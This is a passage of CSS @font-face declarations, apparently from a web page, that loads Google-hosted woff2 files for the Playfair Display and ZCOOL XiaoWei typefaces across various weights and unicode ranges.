{font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.5.woff2) format(\'woff2\');unicode-range: U+fee3, U+fef3, U+ff03-ff04, U+ff07, U+ff0a, U+ff17-ff19, U+ff1c-ff1d, U+ff20-ff3a, U+ff3c, U+ff3e-ff5b, U+ff5d, U+ff61-ff65, U+ff67-ff6a, U+ff6c, U+ff6f-ff78, U+ff7a-ff7d, U+ff80-ff84, U+ff86, U+ff89-ff8e, U+ff92, U+ff97-ff9b, U+ff9d-ff9f, U+ffe0-ffe4, U+ffe6, U+ffe9, U+ffeb, U+ffed, U+fffc, U+1f004, U+1f170-1f171, U+1f192-1f195, U+1f198-1f19a, U+1f1e6-1f1e8;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.6.woff2) format(\'woff2\');unicode-range: U+f0a7, U+f0b2, U+f0b7, U+f0c9, U+f0d8, U+f0da, U+f0dc-f0dd, U+f0e0, U+f0e6, U+f0eb, U+f0fc, U+f101, U+f104-f105, U+f107, U+f10b, U+f11b, U+f14b, U+f18a, U+f193, U+f1d6-f1d7, U+f244, U+f27a, U+f296, U+f2ae, U+f471, U+f4b3, U+f610-f611, U+f880-f881, U+f8ec, U+f8f5, U+f8ff, U+f901, U+f90a, U+f92c-f92d, U+f934, U+f937, U+f941, U+f965, U+f967, U+f969, U+f96b, U+f96f, U+f974, U+f978-f979, U+f97e, U+f981, U+f98a, U+f98e, U+f997, U+f99c, U+f9b2, U+f9b5, U+f9ba, U+f9be, U+f9ca, U+f9d0-f9d1, U+f9dd, U+f9e0-f9e1, U+f9e4, U+f9f7, U+fa00-fa01, U+fa08, U+fa0a, U+fa11, U+fb01-fb02, U+fdfc, U+fe0e, U+fe30-fe31, U+fe33-fe44, U+fe49-fe52, U+fe54-fe57, U+fe59-fe66, U+fe68-fe6b, U+fe8e, U+fe92-fe93, U+feae, U+feb8, U+fecb-fecc, U+fee0;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.21.woff2) format(\'woff2\');unicode-range: U+9f83, U+9f85-9f8d, U+9f90-9f91, U+9f94-9f96, U+9f98, U+9f9b-9f9c, U+9f9e, U+9fa0, U+9fa2, U+9ff0-9fff, U+a001, U+a007, U+a025, U+a046-a047, U+a057, U+a072, U+a078-a079, U+a083, U+a085, U+a100, U+a118, U+a132, U+a134, U+a1f4, U+a242, U+a4a6, U+a4aa, U+a4b0-a4b1, U+a4b3, U+a9c1-a9c2, U+ac00-ac01, U+ac04, U+ac08, U+ac10-ac11, U+ac13-ac16, U+ac19, U+ac1c-ac1d, U+ac24, U+ac70-ac71, U+ac74, U+ac77-ac78, U+ac80-ac81, U+ac83, U+ac8c, U+ac90, U+ac9f-aca0, U+aca8-aca9, U+acac, U+acb0, U+acbd, U+acc1, U+acc4, U+ace0-ace1, U+ace4, U+ace8, U+acf3, U+acf5, U+acfc-acfd, U+ad00, U+ad0c, U+ad11, U+ad1c, U+ad34, U+ad50, U+ad64, U+ad6c, U+ad70, U+ad74, U+ad7f, U+ad81, U+ad8c, U+adc0, U+adc8, U+addc, U+ade0, U+adf8-adf9, U+adfc, U+ae00, U+ae08-ae09, U+ae0b, U+ae30, U+ae34, U+ae38, U+ae40, U+ae4a, U+ae4c, U+ae54, U+ae68, U+aebc, U+aed8, U+af2c-af2d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.22.woff2) format(\'woff2\');unicode-range: U+9e30-9e33, U+9e35-9e3b, U+9e3e, U+9e40-9e44, U+9e46-9e4e, U+9e51, U+9e53, U+9e55-9e58, U+9e5a-9e5c, U+9e5e-9e63, U+9e66-9e6e, U+9e71, U+9e73, U+9e75, U+9e78-9e79, U+9e7c-9e7e, U+9e82, U+9e86-9e88, U+9e8b-9e8c, U+9e90-9e91, U+9e93, U+9e95, U+9e97, U+9e9d, U+9ea4-9ea5, U+9ea9-9eaa, U+9eb4-9eb5, U+9eb8-9eba, U+9ebc-9ebf, U+9ec3, U+9ec9, U+9ecd, U+9ed0, U+9ed2-9ed3, U+9ed5-9ed6, U+9ed9, U+9edc-9edd, U+9edf-9ee0, U+9ee2, U+9ee5, U+9ee7-9eea, U+9eef, U+9ef1, U+9ef3-9ef4, U+9ef6, U+9ef9, U+9efb-9efc, U+9efe, U+9f0b, U+9f0d, U+9f10, U+9f14, U+9f17, U+9f19, U+9f22, U+9f29, U+9f2c, U+9f2f, U+9f31, U+9f37, U+9f39, U+9f3d-9f3e, U+9f41, U+9f4a-9f4b, U+9f51-9f52, U+9f61-9f63, U+9f66-9f67, U+9f80-9f81;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.23.woff2) format(\'woff2\');unicode-range: U+9c82-9c83, U+9c85-9c8c, U+9c8e-9c92, U+9c94-9c9b, U+9c9e-9ca3, U+9ca5-9ca7, U+9ca9, U+9cab, U+9cad-9cae, U+9cb1-9cb7, U+9cb9-9cbd, U+9cbf-9cc0, U+9cc3, U+9cc5-9cc7, U+9cc9-9cd1, U+9cd3-9cda, U+9cdc-9cdd, U+9cdf, U+9ce1-9ce3, U+9ce5, U+9ce9, U+9cee-9cef, U+9cf3-9cf4, U+9cf6, U+9cfc-9cfd, U+9d02, U+9d08-9d09, U+9d12, U+9d1b, U+9d1e, U+9d26, U+9d28, U+9d37, U+9d3b, U+9d3f, U+9d51, U+9d59, U+9d5c-9d5d, U+9d5f-9d61, U+9d6c, U+9d70, U+9d72, U+9d7a, U+9d7e, U+9d84, U+9d89, U+9d8f, U+9d92, U+9daf, U+9db4, U+9db8, U+9dbc, U+9dc4, U+9dc7, U+9dc9, U+9dd7, U+9ddf, U+9df2, U+9df9-9dfa, U+9e0a, U+9e11, U+9e1a, U+9e1e, U+9e20, U+9e22, U+9e28-9e2c, U+9e2e-9e2f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.24.woff2) format(\'woff2\');unicode-range: U+9a80, U+9a83, U+9a85, U+9a88-9a8a, U+9a8d-9a8e, U+9a90, U+9a92-9a93, U+9a95-9a96, U+9a98-9a99, U+9a9b-9aa2, U+9aa5, U+9aa7, U+9aaf-9ab1, U+9ab5-9ab6, U+9ab9-9aba, U+9ac0-9ac4, U+9ac8, U+9acb-9acc, U+9ace-9acf, U+9ad1-9ad2, U+9ad9, U+9adf, U+9ae1, U+9ae3, U+9aea-9aeb, U+9aed-9aef, U+9af4, U+9af9, U+9afb, U+9b03-9b04, U+9b06, U+9b08, U+9b0d, U+9b0f-9b10, U+9b13, U+9b18, U+9b1a, U+9b1f, U+9b22-9b23, U+9b25, U+9b27-9b28, U+9b2a, U+9b2f, U+9b31-9b32, U+9b3b, U+9b43, U+9b46-9b49, U+9b4d-9b4e, U+9b51, U+9b56, U+9b58, U+9b5a, U+9b5c, U+9b5f, U+9b61-9b62, U+9b6f, U+9b77, U+9b80, U+9b88, U+9b8b, U+9b8e, U+9b91, U+9b9f-9ba0, U+9ba8, U+9baa-9bab, U+9bad-9bae, U+9bb0-9bb1, U+9bb8, U+9bc9-9bca, U+9bd3, U+9bd6, U+9bdb, U+9be8, U+9bf0-9bf1, U+9c02, U+9c10, U+9c15, U+9c24, U+9c2d, U+9c32, U+9c39, U+9c3b, U+9c40, U+9c47-9c49, U+9c53, U+9c57, U+9c64, U+9c72, U+9c77-9c78, U+9c7b, U+9c7f-9c80;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.25.woff2) format(\'woff2\');unicode-range: U+98dd, U+98e1-98e2, U+98e7-98ea, U+98ec, U+98ee-98ef, U+98f2, U+98f4, U+98fc-98fe, U+9903, U+9905, U+9908, U+990a, U+990c-990d, U+9913-9914, U+9918, U+991a-991b, U+991e, U+9921, U+9928, U+992c, U+992e, U+9935, U+9938-9939, U+993d-993e, U+9945, U+994b-994c, U+9951-9952, U+9954-9955, U+9957, U+995e, U+9963, U+9966-9969, U+996b-996c, U+996f, U+9974-9975, U+9977-9979, U+997d-997e, U+9980-9981, U+9983-9984, U+9987, U+998a-998b, U+998d-9991, U+9993-9995, U+9997-9998, U+99a5, U+99ab, U+99ad-99ae, U+99b1, U+99b3-99b4, U+99bc, U+99bf, U+99c1, U+99c3-99c6, U+99cc, U+99d0, U+99d2, U+99d5, U+99db, U+99dd, U+99e1, U+99ed, U+99f1, U+99ff, U+9a01, U+9a03-9a04, U+9a0e-9a0f, U+9a11-9a13, U+9a19, U+9a1b, U+9a28, U+9a2b, U+9a30, U+9a32, U+9a37, U+9a40, U+9a45, U+9a4a, U+9a4d-9a4e, U+9a52, U+9a55, U+9a57, U+9a5a-9a5b, U+9a5f, U+9a62, U+9a65, U+9a69, U+9a6b, U+9a6e, U+9a75, U+9a77-9a7a, U+9a7d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.26.woff2) format(\'woff2\');unicode-range: U+975b-975c, U+9763, U+9765-9766, U+976c-976d, U+9773, U+9776, U+977a, U+977c, U+9784-9785, U+978e-978f, U+9791-9792, U+9794-9795, U+9798, U+979a, U+979e, U+97a3, U+97a5-97a6, U+97a8, U+97ab-97ac, U+97ae-97af, U+97b2, U+97b4, U+97c6, U+97cb-97cc, U+97d3, U+97d8, U+97dc, U+97e1, U+97ea-97eb, U+97ee, U+97fb, U+97fe-97ff, U+9801-9803, U+9805-9806, U+9808, U+980c, U+9810-9814, U+9817-9818, U+981e, U+9820-9821, U+9824, U+9828, U+982b-982d, U+9830, U+9834, U+9838-9839, U+983c, U+9846, U+984d-984f, U+9851-9852, U+9854-9855, U+9857-9858, U+985a-985b, U+9862-9863, U+9865, U+9867, U+986b, U+986f-9871, U+9877-9878, U+987c, U+9880, U+9883, U+9885, U+9889, U+988b-988f, U+9893-9895, U+9899-989b, U+989e-989f, U+98a1-98a2, U+98a5-98a7, U+98a9, U+98af, U+98b1, U+98b6, U+98ba, U+98be, U+98c3-98c4, U+98c6-98c8, U+98cf-98d6, U+98da-98db;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.27.woff2) format(\'woff2\');unicode-range: U+95c4-95ca, U+95cc-95cd, U+95d4-95d6, U+95d8, U+95e1-95e2, U+95e9, U+95f0-95f1, U+95f3, U+95f6, U+95fc, U+95fe-95ff, U+9602-9604, U+9606-960d, U+960f, U+9611-9613, U+9615-9617, U+9619-961b, U+961d, U+9621, U+9628, U+962f, U+963c-963e, U+9641-9642, U+9649, U+9654, U+965b-965f, U+9661, U+9663, U+9665, U+9667-9668, U+966c, U+9670, U+9672-9674, U+9678, U+967a, U+967d, U+9682, U+9685, U+9688, U+968a, U+968d-968e, U+9695, U+9697-9698, U+969e, U+96a0, U+96a3-96a4, U+96a8, U+96aa, U+96b0-96b1, U+96b3-96b4, U+96b7-96b9, U+96bb-96bd, U+96c9, U+96cb, U+96ce, U+96d1-96d2, U+96d6, U+96d9, U+96db-96dc, U+96de, U+96e0, U+96e3, U+96e9, U+96eb, U+96f0-96f2, U+96f9, U+96ff, U+9701-9702, U+9705, U+9708, U+970a, U+970e-970f, U+9711, U+9719, U+9727, U+972a, U+972d, U+9730, U+973d, U+9742, U+9744, U+9748-9749, U+9750-9751, U+975a;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.28.woff2) format(\'woff2\');unicode-range: U+94f5, U+94f7, U+94f9, U+94fb-94fd, U+94ff, U+9503-9504, U+9506-9507, U+9509-950a, U+950d-950f, U+9511-9518, U+951a-9520, U+9522, U+9528-952d, U+9530-953a, U+953c-953f, U+9543-9546, U+9548-9550, U+9552-9555, U+9557-955b, U+955d-9568, U+956a-956d, U+9570-9574, U+9583, U+9586, U+9589, U+958e-958f, U+9591-9592, U+9594, U+9598-9599, U+959e-95a0, U+95a2-95a6, U+95a8-95b2, U+95b4, U+95b8-95c3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.29.woff2) format(\'woff2\');unicode-range: U+941c-942b, U+942d-942e, U+9432-9433, U+9435, U+9438, U+943a, U+943e, U+9444, U+944a, U+9451-9452, U+945a, U+9462-9463, U+9465, U+9470-9487, U+948a-9492, U+9494-9498, U+949a, U+949c-949d, U+94a1, U+94a3-94a4, U+94a8, U+94aa-94ad, U+94af, U+94b2, U+94b4-94ba, U+94bc-94c0, U+94c4, U+94c6-94db, U+94de-94ec, U+94ee-94f1, U+94f3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.30.woff2) format(\'woff2\');unicode-range: U+92ec-92ed, U+92f0, U+92f3, U+92f8, U+92fc, U+9304, U+9306, U+9310, U+9312, U+9315, U+9318, U+931a, U+931e, U+9320-9322, U+9324, U+9326-9329, U+932b-932c, U+932f, U+9331-9332, U+9335-9336, U+933e, U+9340-9341, U+934a-9360, U+9362-9363, U+9365-936b, U+936e, U+9375, U+937e, U+9382, U+938a, U+938c, U+938f, U+9393-9394, U+9396-9397, U+939a, U+93a2, U+93a7, U+93ac-93cd, U+93d0-93d1, U+93d6-93d8, U+93de-93df, U+93e1-93e2, U+93e4, U+93f8, U+93fb, U+93fd, U+940e-941a;}@font-face {font-family: 